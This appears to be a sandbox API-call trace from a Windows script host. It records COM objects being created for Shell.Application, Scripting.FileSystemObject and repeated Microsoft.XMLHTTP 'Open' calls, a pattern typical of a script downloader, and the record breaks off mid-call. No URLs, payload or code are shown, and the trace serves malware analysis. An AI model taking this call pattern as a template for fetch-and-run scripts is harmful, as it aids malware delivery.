	[0715.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0715.051] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0715.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0715.051] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0715.051] SysStringLen (param_1=0x0) returned 0x0
	[0715.051] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0715.051] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0715.051] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0715.051] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0715.052] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0715.052] ??2@YAPEAX_K@Z () returned 0x62f350
	[0715.052] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0715.052] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0715.052] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0715.052] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0715.052] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0715.052] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0715.052] SysStringLen (param_1=0x0) returned 0x0
	[0715.052] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0715.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0715.055] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0715.055] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0715.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0715.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0715.055] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0719.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0719.769] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0719.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0719.771] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.771] SysStringLen (param_1=0x0) returned 0x0
	[0719.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.771] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0719.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0719.772] ??2@YAPEAX_K@Z () returned 0x62f310
	[0719.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0719.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.772] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0719.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0719.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0719.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.775] SysStringLen (param_1=0x0) returned 0x0
	[0719.776] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0719.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0719.776] ??2@YAPEAX_K@Z () returned 0x62f330
	[0719.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0719.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.776] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0719.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0719.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0719.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.777] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.777] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.777] SysStringLen (param_1=0x0) returned 0x0
	[0719.777] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.777] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0719.777] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0719.777] ??2@YAPEAX_K@Z () returned 0x62f310
	[0719.778] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0719.778] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.778] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0719.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0719.778] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0719.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.778] SysStringLen (param_1=0x0) returned 0x0
	[0719.778] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.779] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0719.779] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0719.779] ??2@YAPEAX_K@Z () returned 0x62f330
	[0719.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.779] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0719.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.779] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.780] longjmp () 
	[0719.780] longjmp () 
	[0719.780] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.780] SysStringLen (param_1=0x0) returned 0x0
	[0719.780] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0719.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0719.780] ??2@YAPEAX_K@Z () returned 0x62f310
	[0719.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
